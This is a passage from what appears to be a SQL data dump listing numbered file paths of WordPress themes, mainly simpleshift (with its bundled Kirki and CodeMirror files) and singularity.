vendor/codemirror/mode/haml/index.html'),(4755,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/haml/test.js'),(4756,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/htmlembedded/htmlembedded.js'),(4757,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/htmlembedded/index.html'),(4758,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/htmlmixed/htmlmixed.js'),(4759,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/htmlmixed/index.html'),(4760,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/index.html'),(4761,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/javascript/index.html'),(4762,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/javascript/javascript.js'),(4763,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/javascript/json-ld.html'),(4764,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/javascript/test.js'),(4765,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/javascript/typescript.html'),(4766,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/markdown/index.html'),(4767,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/markdown/markdown.js'),(4768,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/markdown/test.js'),(4769,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/meta.js'),(4770,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/php/index.html'),(4771,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/php/php.js'),(4772,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/php/test.js'),(4773,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/sass/index.html'),(4774,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/sass/sass.js'),(4775,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/smarty/index.html'),(4776,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/smarty/smarty.js'),(4777,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/sql/index.html'),(4778,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/sql/sql.js'),(4779,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/stylus/index.html'),(4780,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/stylus/stylus.js'),(4781,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/textile/index.html'),(4782,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/textile/test.js'),(4783,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/textile/textile.js'),(4784,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/twig/index.html'),(4785,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/twig/twig.js'),(4786,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/xml/index.html'),(4787,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/xml/test.js'),(4788,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/xml/xml.js'),(4789,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/yaml/index.html'),(4790,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/yaml/yaml.js'),(4791,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/3024-day.css'),(4792,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/3024-night.css'),(4793,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/abcdef.css'),(4794,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/ambiance-mobile.css'),(4795,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/ambiance.css'),(4796,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/base16-dark.css'),(4797,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/base16-light.css'),(4798,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/bespin.css'),(4799,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/blackboard.css'),(4800,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/cobalt.css'),(4801,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/colorforth.css'),(4802,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/dracula.css'),(4803,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/eclipse.css'),(4804,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/elegant.css'),(4805,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/erlang-dark.css'),(4806,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/hopscotch.css'),(4807,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/icecoder.css'),(4808,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/isotope.css'),(4809,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/kirki-dark.css'),(4810,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/kirki-light.css'),(4811,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/lesser-dark.css'),(4812,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/liquibyte.css'),(4813,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/material.css'),(4814,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/mbo.css'),(4815,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/mdn-like.css'),(4816,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/midnight.css'),(4817,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/monokai.css'),(4818,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/neat.css'),(4819,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/neo.css'),(4820,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/night.css'),(4821,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/paraiso-dark.css'),(4822,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/paraiso-light.css'),(4823,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/pastel-on-dark.css'),(4824,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/railscasts.css'),(4825,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/rubyblue.css'),(4826,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/seti.css'),(4827,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/solarized.css'),(4828,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/the-matrix.css'),(4829,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/tomorrow-night-bright.css'),(4830,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/tomorrow-night-eighties.css'),(4831,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/ttcn.css'),(4832,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/twilight.css'),(4833,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/vibrant-ink.css'),(4834,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/xq-dark.css'),(4835,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/xq-light.css'),(4836,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/yeti.css'),(4837,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/zenburn.css'),(4838,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/selectize.js'),(4839,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/serialize.js'),(4840,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/tinymce.plugin.code.js'),(4841,'wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/wp-color-picker-alpha.js'),(4842,'wp-content/themes/simpleshift/inc/kirki/assets/json/webfonts.php'),(4843,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/checkbox.scss'),(4844,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/code.scss'),(4845,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/color-palette.scss'),(4846,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/color.scss'),(4847,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/dashicons.scss'),(4848,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/date.scss'),(4849,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/datetime.scss'),(4850,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/dimension.scss'),(4851,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/editor.scss'),(4852,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/generic.scss'),(4853,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/multicheck.scss'),(4854,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/multicolor.scss'),(4855,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/number.scss'),(4856,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/palette.scss'),(4857,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/radio-buttonset.scss'),(4858,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/radio-image.scss'),(4859,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/radio.scss'),(4860,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/repeater.scss'),(4861,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/select.scss'),(4862,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/slider.scss'),(4863,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/sortable.scss'),(4864,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/spacing.scss'),(4865,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/switch.scss'),(4866,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/toggle.scss'),(4867,'wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/typography.scss'),(4868,'wp-content/themes/simpleshift/inc/kirki/assets/scss/customizer.scss'),(4869,'wp-content/themes/simpleshift/inc/kirki/assets/scss/global.scss'),(4870,'wp-content/themes/simpleshift/inc/kirki/assets/scss/panels/expanded.scss'),(4871,'wp-content/themes/simpleshift/inc/kirki/assets/scss/sections/expanded.scss'),(4872,'wp-content/themes/simpleshift/inc/kirki/assets/scss/sections/hover.scss'),(4873,'wp-content/themes/simpleshift/inc/kirki/assets/scss/tooltips.scss'),(4874,'wp-content/themes/simpleshift/inc/kirki/assets/xml/colourlovers-top.xml'),(4875,'wp-content/themes/simpleshift/inc/kirki/autoloader.php'),(4876,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-active-callback.php'),(4877,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-config.php'),(4878,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-control.php'),(4879,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-customize-control.php'),(4880,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-enqueue.php'),(4881,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-explode-background-field.php'),(4882,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-field.php'),(4883,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-fonts-google.php'),(4884,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-fonts.php'),(4885,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-helper.php'),(4886,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-init.php'),(4887,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-l10n.php'),(4888,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-panel.php'),(4889,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-sanitize-values.php'),(4890,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-scripts-registry.php'),(4891,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-section.php'),(4892,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-selective-refresh.php'),(4893,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-settings.php'),(4894,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-toolkit.php'),(4895,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki-values.php'),(4896,'wp-content/themes/simpleshift/inc/kirki/includes/class-kirki.php'),(4897,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-checkbox-control.php'),(4898,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-code-control.php'),(4899,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-color-alpha-control.php'),(4900,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-color-control.php'),(4901,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-color-palette-control.php'),(4902,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-custom-control.php'),(4903,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-dashicons-control.php'),(4904,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-date-control.php'),(4905,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-datetime-control.php'),(4906,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-dimension-control.php'),(4907,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-dropdown-pages-control.php'),(4908,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-editor-control.php'),(4909,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-generic-control.php'),(4910,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-multicheck-control.php'),(4911,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-multicolor-control.php'),(4912,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-number-control.php'),(4913,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-palette-control.php'),(4914,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-preset-control.php'),(4915,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-radio-buttonset-control.php'),(4916,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-radio-control.php'),(4917,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-radio-image-control.php'),(4918,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-repeater-control.php'),(4919,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-select-control.php'),(4920,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-slider-control.php'),(4921,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php'),(4922,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-spacing-control.php'),(4923,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-switch-control.php'),(4924,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-toggle-control.php'),(4925,'wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-typography-control.php'),(4926,'wp-content/themes/simpleshift/inc/kirki/includes/customizer/scripts/class-kirki-customizer-scripts-icons.php'),(4927,'wp-content/themes/simpleshift/inc/kirki/includes/customizer/scripts/class-kirki-customizer-scripts-loading.php'),(4928,'wp-content/themes/simpleshift/inc/kirki/includes/customizer/scripts/class-kirki-customizer-scripts-tooltips.php'),(4929,'wp-content/themes/simpleshift/inc/kirki/includes/deprecated.php'),(4930,'wp-content/themes/simpleshift/inc/kirki/includes/dynamic-css.php'),(4931,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-checkbox.php'),(4932,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-code.php'),(4933,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-color-alpha.php'),(4934,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-color-palette.php'),(4935,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-color.php'),(4936,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-custom.php'),(4937,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-dashicons.php'),(4938,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-date.php'),(4939,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-dimension.php'),(4940,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-dropdown-pages.php'),(4941,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-editor.php'),(4942,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-generic.php'),(4943,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-group-title.php'),(4944,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-image.php'),(4945,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-kirki-generic.php'),(4946,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-multicheck.php'),(4947,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-multicolor.php'),(4948,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-number.php'),(4949,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-palette.php'),(4950,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-preset.php'),(4951,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-radio-buttonset.php'),(4952,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-radio-image.php'),(4953,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-radio.php'),(4954,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-select.php'),(4955,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-select2-multiple.php'),(4956,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-select2.php'),(4957,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-slider.php'),(4958,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-sortable.php'),(4959,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-spacing.php'),(4960,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-switch.php'),(4961,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-text.php'),(4962,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-textarea.php'),(4963,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-toggle.php'),(4964,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-typography.php'),(4965,'wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-upload.php'),(4966,'wp-content/themes/simpleshift/inc/kirki/includes/lib/class-aricolor.php'),(4967,'wp-content/themes/simpleshift/inc/kirki/includes/lib/class-kirki-color.php'),(4968,'wp-content/themes/simpleshift/inc/kirki/includes/lib/class-kirki-colourlovers.php'),(4969,'wp-content/themes/simpleshift/inc/kirki/includes/output/class-kirki-output.php'),(4970,'wp-content/themes/simpleshift/inc/kirki/includes/output/control/class-kirki-output-control-spacing.php'),(4971,'wp-content/themes/simpleshift/inc/kirki/includes/output/control/class-kirki-output-control-typography.php'),(4972,'wp-content/themes/simpleshift/inc/kirki/includes/output/field/class-kirki-output-field-multicolor.php'),(4973,'wp-content/themes/simpleshift/inc/kirki/includes/output/field/class-kirki-output-field-spacing.php'),(4974,'wp-content/themes/simpleshift/inc/kirki/includes/output/field/class-kirki-output-field-typography.php'),(4975,'wp-content/themes/simpleshift/inc/kirki/includes/output/property/class-kirki-output-property-background-image.php'),(4976,'wp-content/themes/simpleshift/inc/kirki/includes/output/property/class-kirki-output-property-background-position.php'),(4977,'wp-content/themes/simpleshift/inc/kirki/includes/output/property/class-kirki-output-property-font-family.php'),(4978,'wp-content/themes/simpleshift/inc/kirki/includes/output/property/class-kirki-output-property.php'),(4979,'wp-content/themes/simpleshift/inc/kirki/includes/panels/class-kirki-panels-default-panel.php'),(4980,'wp-content/themes/simpleshift/inc/kirki/includes/panels/class-kirki-panels-expanded-panel.php'),(4981,'wp-content/themes/simpleshift/inc/kirki/includes/scripts/class-kirki-scripts-icons.php'),(4982,'wp-content/themes/simpleshift/inc/kirki/includes/scripts/class-kirki-scripts-loading.php'),(4983,'wp-content/themes/simpleshift/inc/kirki/includes/scripts/class-kirki-scripts-tooltips.php'),(4984,'wp-content/themes/simpleshift/inc/kirki/includes/sections/class-kirki-sections-default-section.php'),(4985,'wp-content/themes/simpleshift/inc/kirki/includes/sections/class-kirki-sections-expanded-section.php'),(4986,'wp-content/themes/simpleshift/inc/kirki/includes/sections/class-kirki-sections-hover-section.php'),(4987,'wp-content/themes/simpleshift/inc/kirki/includes/settings/class-kirki-settings-default-setting.php'),(4988,'wp-content/themes/simpleshift/inc/kirki/includes/settings/class-kirki-settings-repeater-setting.php'),(4989,'wp-content/themes/simpleshift/inc/kirki/includes/styles/class-kirki-styles-customizer.php'),(4990,'wp-content/themes/simpleshift/inc/kirki/includes/styles/class-kirki-styles-frontend.php'),(4991,'wp-content/themes/simpleshift/inc/kirki/includes/styles/class-kirki-styles-output-css.php'),(4992,'wp-content/themes/simpleshift/inc/kirki/includes/webfonts.php'),(4993,'wp-content/themes/simpleshift/inc/kirki/kirki.php'),(4994,'wp-content/themes/simpleshift/inc/kirki/readme.txt'),(4995,'wp-content/themes/simpleshift/inc/meta_boxes.php'),(4996,'wp-content/themes/simpleshift/inc/options.php'),(4997,'wp-content/themes/simpleshift/inc/pro/class-customize.php'),(4998,'wp-content/themes/simpleshift/inc/pro/customize-controls.css'),(4999,'wp-content/themes/simpleshift/inc/pro/customize-controls.js'),(5000,'wp-content/themes/simpleshift/inc/pro/screenshot.png'),(5001,'wp-content/themes/simpleshift/inc/pro/section-pro.php'),(5002,'wp-content/themes/simpleshift/inc/tgm/class-tgm-plugin-activation.php'),(5003,'wp-content/themes/simpleshift/inc/tgm/tgm-init.php'),(5004,'wp-content/themes/simpleshift/inc/wp_bootstrap_navwalker.php'),(5005,'wp-content/themes/simpleshift/index.php'),(5006,'wp-content/themes/simpleshift/landing.php'),(5007,'wp-content/themes/simpleshift/lang/simpleshift.pot'),(5008,'wp-content/themes/simpleshift/parts/blog-pagination.php'),(5009,'wp-content/themes/simpleshift/parts/companion/frontpage-about.php'),(5010,'wp-content/themes/simpleshift/parts/companion/frontpage-action.php'),(5011,'wp-content/themes/simpleshift/parts/companion/frontpage-action2.php'),(5012,'wp-content/themes/simpleshift/parts/companion/frontpage-featured.php'),(5013,'wp-content/themes/simpleshift/parts/companion/frontpage-news.php'),(5014,'wp-content/themes/simpleshift/parts/companion/frontpage-social.php'),(5015,'wp-content/themes/simpleshift/parts/companion/frontpage-team.php'),(5016,'wp-content/themes/simpleshift/parts/companion/frontpage-test.php'),(5017,'wp-content/themes/simpleshift/parts/content-blog.php'),(5018,'wp-content/themes/simpleshift/parts/content-page.php'),(5019,'wp-content/themes/simpleshift/parts/content-single.php'),(5020,'wp-content/themes/simpleshift/parts/error-404.php'),(5021,'wp-content/themes/simpleshift/parts/error-no_results.php'),(5022,'wp-content/themes/simpleshift/parts/header-banner.php'),(5023,'wp-content/themes/simpleshift/parts/header-menu.php'),(5024,'wp-content/themes/simpleshift/parts/image-750_500.php'),(5025,'wp-content/themes/simpleshift/parts/loop.php'),(5026,'wp-content/themes/simpleshift/parts/single_post_nav.php'),(5027,'wp-content/themes/simpleshift/parts/tax_tags.php'),(5028,'wp-content/themes/simpleshift/parts/title.php'),(5029,'wp-content/themes/simpleshift/parts/wp_link_pages.php'),(5030,'wp-content/themes/simpleshift/readme.txt'),(5031,'wp-content/themes/simpleshift/screenshot.jpg'),(5032,'wp-content/themes/simpleshift/sidebar.php'),(5033,'wp-content/themes/simpleshift/style.css'),(5034,'wp-content/themes/singularity/404.php'),(5035,'wp-content/themes/singularity/LICENSE'),(5036,'wp-content/themes/singularity/archive-discussion-topics.php'),(5037,'wp-content/themes/singularity/archive-download.php'),(5038,'wp-content/themes/singularity/archive.php'),(5039,'wp-content/themes/singularity/assets/images/placeholder.png'),(5040,'wp-content/themes/singularity/comments.php'),(5041,'wp-content/themes/singularity/footer.php'),(5042,'wp-content/themes/singularity/functions.php'),(5043,'wp-content/themes/singularity/header.php'),(5044,'wp-content/themes/singularity/inc/custom-header.php'),(5045,'wp-content/themes/singularity/inc/customizer-library/custom-controls/content.php'),(5046,'wp-content/themes/singularity/inc/customizer-library/customizer-library.php'),(5047,'wp-content/themes/singularity/inc/customizer-library/extensions/fonts.php'),(5048,'wp-content/themes/singularity/inc/customizer-library/extensions/interface.php'),(5049,'wp-content/themes/singularity/inc/customizer-library/extensions/preview.php'),(5050,'wp-content/themes/singularity/inc/customizer-library/extensions/sanitization.php'),(5051,'wp-content/themes/singularity/inc/customizer-library/extensions/style-builder.php'),(5052,'wp-content/themes/singularity/inc/customizer-library/extensions/utilities.php'),(5053,'wp-content/themes/singularity/inc/customizer-library/js/customizer.js'),(5054,'wp-content/themes/singularity/inc/customizer-mods.php'),(5055,'wp-content/themes/singularity/inc/customizer-options.php'),(5056,'wp-content/themes/singularity/inc/customizer-styles.php'),(5057,'wp-content/themes/singularity/inc/customizer.php'),(5058,'wp-content/themes/singularity/inc/extras.php'),(5059,'wp-content/themes/singularity/inc/functions-discussion-board.php'),(5060,'wp-content/themes/singularity/inc/functions-edd.php'),(5061,'wp-content/themes/singularity/inc/functions-gridgets.php'),(5062,'wp-content/themes/singularity/inc/functions-homepage.php'),(5063,'wp-content/themes/singularity/inc/functions-layout.php'),(5064,'wp-content/themes/singularity/inc/functions-zoom.php'),(5065,'wp-content/themes/singularity/inc/jetpack.php'),(5066,'wp-content/themes/singularity/inc/template-tags.php'),(5067,'wp-content/themes/singularity/index.php'),(5068,'wp-content/themes/singularity/js/customizer.js'),(5069,'wp-content/themes/singularity/js/singularity.js'),(5070,'wp-content/themes/singularity/js/skip-link-focus-fix.js'),(5071,'wp-content/themes/singularity/js/zoom.js'),(5072,'wp-content/themes/singularity/js/zoom.min.js'),(5073,'wp-content/themes/singularity/page-full-width.php'),(5074,'wp-content/themes/singularity/page-homepage.php'),(5075,'wp-content/themes/singularity/page-narrow-column.php'),(5076,'wp-content/themes/singularity/page-sidebar-right.php'),(5077,'wp-content/themes/singularity/page.php'),(5078,'wp-content/themes/singularity/readme.txt'),(5079,'wp-content/themes/singularity/rtl.css'),(5080,'wp-content/themes/singularity/screenshot.jpg'),(5081,'wp-content/themes/singularity/search.php'),(5082,'wp-content/themes/singularity/sidebar-discussion-board.php'),(5083,'wp-content/themes/singularity/sidebar-edd.php'),(5084,'wp-content/themes/singularity/sidebar.php'),(5085,'wp-content/themes/singularity/single-discussion-topics.php'),(5086,'wp-content/themes/singularity/single-download.php'),(5087,'wp-content/themes/singularity/single.php'),(5088,'wp-content/themes/singularity/style.css'),(5089,'wp-content/themes/singularity/taxonomy-board.php'),(5090,'wp-content/themes/singularity/taxonomy-download_category.php'),(5091,'wp-content/themes/singularity/taxonomy-download_tag.php'),(5092,'wp-content/themes/singularity/template-parts/author-bio.php'),(5093,'wp-content/themes/singularity/template-parts/content-discussion-topic.php'),(5094,'wp-content/themes/singularity/template-parts/content-download.php'),(5095,'wp-content/themes/singularity/template-parts/content-featured.php'),(5096,'wp-content/themes/singularity/template-parts/content-home.php'),(5097,'wp-content/themes/singularity/template-parts/content-none.php'),(5098,'wp-content/themes/singularity/template-parts/content-page-full-width.php'),(5099,'wp-content/themes/singularity/template-parts/content-page-narrow-column.php'),(5100,'wp-content/themes/singularity/template-parts/content-page.php'),(5101,'wp-content/themes/singularity/template-parts/content-search.php'),(5102,'wp-content/themes/singularity/template-parts/content-single-discussion-topics.php'),(5103,'wp-content/themes/singularity/template-parts/content-single-download.php'),(5104,'wp-content/themes/singularity/template-parts/content-single.php'),(5105,'wp-content/themes/singularity/template-parts/content.php'),(5106,'wp-content/themes/singularity/template-parts/headers/header-centered.php'),(5107,'wp-content/themes/singularity/template-parts/headers/header-standard.php'),(5108,'wp-content/themes/singularity/template-parts/headers/pinned-thumbnail.php'),(5109,'wp-content/themes/singularity/template-parts/headers/top-bar-centered.php'),(5110,'wp-content/themes/singularity/template-parts/headers/top-bar-standard.php'),(5111,'wp-content/themes/skt-pathway/404.php'),(5112,'wp-con